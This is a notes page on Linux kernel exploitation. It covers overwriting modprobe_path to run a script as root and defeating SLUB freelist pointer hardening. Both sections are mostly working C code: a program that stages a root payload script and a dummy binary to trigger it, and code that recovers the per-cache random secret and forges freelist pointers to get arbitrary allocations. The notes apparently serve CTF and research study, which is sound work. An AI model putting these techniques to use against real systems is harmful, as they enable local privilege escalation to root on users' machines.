xct's notes
Linux Kernel

Overwriting modprobe_path technique

Conditions:
  • Known address of modprobe_path (unaffected by FG-KASLR, which only shuffles functions in .text; modprobe_path is a data symbol)
  • Known address of kpti_trampoline (unaffected by FG-KASLR; only needed if the write is done from a ROP chain that then has to return to userland cleanly)
  • Arbitrary Write
We overwrite modprobe_path (the kernel's "/sbin/modprobe" string) with the path of our own shell script, then execve() a file that no registered binfmt accepts and whose first four bytes contain at least one non-printable character. search_binary_handler() then calls request_module("binfmt-%04x", ...), which runs whatever modprobe_path points at as root through the usermode helper, so our script runs as root in userland. No kernel code is executed from user pages and no user memory is dereferenced from the kernel, which is why this technique bypasses SMEP/SMAP.
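The user-space half of this, as an added example (my code, not from these notes): stage the payload script and a dummy "binary" with an unknown magic, and check up front that the dummy would actually make the kernel ask for a binfmt module. The paths, the payload script and the printable() rendering of the fs/exec.c check are my assumptions; the arbitrary write itself is exploit-specific and is left as a marked gap.

```c
/* Added example: user-space side of the modprobe_path overwrite.
 * Stages /tmp/w (payload) and /tmp/dummy (unknown magic), then execve()s the
 * dummy once the exploit's arbitrary write has pointed modprobe_path at /tmp/w. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

/* Paths are assumptions; anything the root mount namespace can reach works. */
#define PAYLOAD_SCRIPT "/tmp/w"
#define DUMMY_BIN      "/tmp/dummy"

/* My rendering of printable() in fs/exec.c: the kernel only calls
 * request_module("binfmt-%04x") when NOT all of the first four bytes are
 * printable, and only after every registered binfmt returned -ENOEXEC, so
 * this check is necessary, not sufficient (a 0x7f-ELF header passes it but
 * is simply loaded as ELF). */
static int printable(int c)
{
    return c == '\t' || c == '\n' || (0x20 <= c && c <= 0x7e);
}

int has_unknown_magic(const unsigned char *hdr)
{
    return !(printable(hdr[0]) && printable(hdr[1]) &&
             printable(hdr[2]) && printable(hdr[3]));
}

/* Module alias the helper is asked for: "binfmt-%04x" of the u16 at offset 2
 * (little-endian, as on x86-64). */
void binfmt_alias(const unsigned char *hdr, char *out, size_t n)
{
    unsigned short magic = (unsigned short)(hdr[2] | (hdr[3] << 8));
    snprintf(out, n, "binfmt-%04x", magic);
}

static int write_file(const char *path, const void *buf, size_t len, mode_t mode)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
    if (fd < 0)
        return -1;
    ssize_t w = write(fd, buf, len);
    close(fd);
    if (w != (ssize_t)len)
        return -1;
    return chmod(path, mode);   /* umask-proof: the helper runs it as root */
}

/* Returns 0 on success, -1 on error. The script runs as root from the
 * usermode helper with no tty and an empty environment, so it copies the
 * result somewhere we can read it instead of trying to be interactive. */
int stage_trigger(const char *script, const char *dummy)
{
    const char payload[] =
        "#!/bin/sh\n"
        "cp /flag /tmp/flag && chmod 0444 /tmp/flag\n";   /* assumed flag path */
    const unsigned char magic[4] = { 0xff, 0xff, 0xff, 0xff };

    if (!has_unknown_magic(magic))
        return -1;
    if (write_file(script, payload, sizeof(payload) - 1, 0755) < 0)
        return -1;
    return write_file(dummy, magic, sizeof(magic), 0755);
}

int main(void)
{
    if (stage_trigger(PAYLOAD_SCRIPT, DUMMY_BIN) < 0) {
        perror("stage_trigger");
        return 1;
    }

    /* ... arbitrary write goes here: copy PAYLOAD_SCRIPT, NUL-terminated,
     * over the modprobe_path buffer at its (leaked) kernel address ... */

    /* execve() of the dummy makes the kernel run modprobe_path as root to
     * load "binfmt-ffff"; that runs our script before execve fails with ENOEXEC. */
    execl(DUMMY_BIN, DUMMY_BIN, (char *)NULL);
    perror("execve");   /* expected: ENOEXEC, but the script has already run */
    return 0;
}
```

The 0xff bytes also dodge binfmt_script (needs "#!") and binfmt_misc unless a handler for that exact magic is registered on the target.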
References:

Bypass CONFIG_SLAB_FREELIST_HARDENED

With this option SLUB stores every freelist pointer obfuscated (freelist_ptr() in mm/slub.c):

(void *)((unsigned long)ptr ^ s->random ^ ptr_addr);

ptr is the next free object, ptr_addr is the address of the freelist pointer field itself (object + s->offset) and s->random is a random value drawn once when the kmem_cache is created, so it is per cache, not per slab page. Because this is only an xor, one leaked encoded pointer from a free object whose next object and own address are known gives s->random = encoded ^ ptr ^ ptr_addr, and from then on any next pointer can be forged for that cache. Two caveats for 5.7 and later: ptr_addr goes through swab() before the xor, and s->offset is no longer 0 but inside the object, so both must be accounted for. The option also adds BUG_ON(object == fp) in set_freepointer(), so freeing the object that is already at the head of the freelist (a plain double free) panics instead of going unnoticed.
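A user-space model of that recovery and forgery, as an added example (my code, not kernel code and not from these notes): encode a freelist pointer the way freelist_ptr() does, recover s->random from one leaked free object, and compute the value to write back so the next allocation returns an arbitrary address. The cache random value, object addresses, the 0x80 offset used for the 5.7+ variant and the target address are all constructed.

```c
/* Added example: SLUB freelist pointer obfuscation, s->random recovery from a
 * single leaked free object, and forging a next pointer. Stand-alone model. */
#include <stdint.h>
#include <stdio.h>

/* Pre-5.7 kernels xor ptr_addr as is; 5.7+ byte-swap it first (swab()). */
static uint64_t mix_addr(uint64_t ptr_addr, int swab)
{
    return swab ? __builtin_bswap64(ptr_addr) : ptr_addr;
}

/* freelist_ptr(): what the kernel stores at ptr_addr for next object `next`. */
uint64_t encode_fp(uint64_t s_random, uint64_t next, uint64_t ptr_addr, int swab)
{
    return next ^ s_random ^ mix_addr(ptr_addr, swab);
}

/* get_freepointer(): xor is its own inverse, so decoding is the same operation. */
uint64_t decode_fp(uint64_t s_random, uint64_t stored, uint64_t ptr_addr, int swab)
{
    return stored ^ s_random ^ mix_addr(ptr_addr, swab);
}

/* Attacker side: read the stored value out of a free object (UAF read or an
 * uninitialised-memory leak), know that object's address and its freelist
 * successor (e.g. the adjacent object in a freshly filled slab), and the
 * per-cache secret falls out. */
uint64_t recover_random(uint64_t stored, uint64_t next, uint64_t ptr_addr, int swab)
{
    return stored ^ next ^ mix_addr(ptr_addr, swab);
}

/* Value to write at ptr_addr so the allocator hands out `target` next. */
uint64_t forge_fp(uint64_t s_random, uint64_t target, uint64_t ptr_addr, int swab)
{
    return encode_fp(s_random, target, ptr_addr, swab);
}

/* Runs the whole attack on a constructed cache. Returns 1 if the forged
 * pointer decodes back to the target under the real secret, 0 otherwise. */
int demo(int swab)
{
    const uint64_t s_random = 0x9e3779b97f4a7c15ULL;  /* s->random, unknown to us */
    const uint64_t obj_size = 0x100;
    const uint64_t offset   = swab ? 0x80 : 0;          /* s->offset: mid-object since 5.7 */
    const uint64_t obj_a    = 0xffff888012340000ULL;    /* free object we can read */
    const uint64_t obj_b    = obj_a + obj_size;         /* its freelist successor */
    const uint64_t target   = 0xffffffff82345678ULL;    /* e.g. modprobe_path */
    const uint64_t slot     = obj_a + offset;           /* where the pointer lives */

    /* What the kernel actually stored in obj_a's freelist slot. */
    uint64_t stored = encode_fp(s_random, obj_b, slot, swab);

    /* Recover the secret from the leak ... */
    uint64_t guess = recover_random(stored, obj_b, slot, swab);
    if (guess != s_random)
        return 0;

    /* ... and rewrite obj_a's slot; the allocation after obj_a returns target. */
    uint64_t forged = forge_fp(guess, target, slot, swab);
    uint64_t next   = decode_fp(s_random, forged, slot, swab);
    printf("swab=%d stored=%#lx random=%#lx forged=%#lx -> next=%#lx\n",
           swab, (unsigned long)stored, (unsigned long)guess,
           (unsigned long)forged, (unsigned long)next);
    return next == target;
}

int main(void)
{
    return (demo(0) && demo(1)) ? 0 : 1;
}
```

Note that the forged value must be written with the same swab/offset convention the running kernel uses; getting either wrong produces a wild next pointer and usually a crash in the next kmalloc() from that cache, not a clean failure.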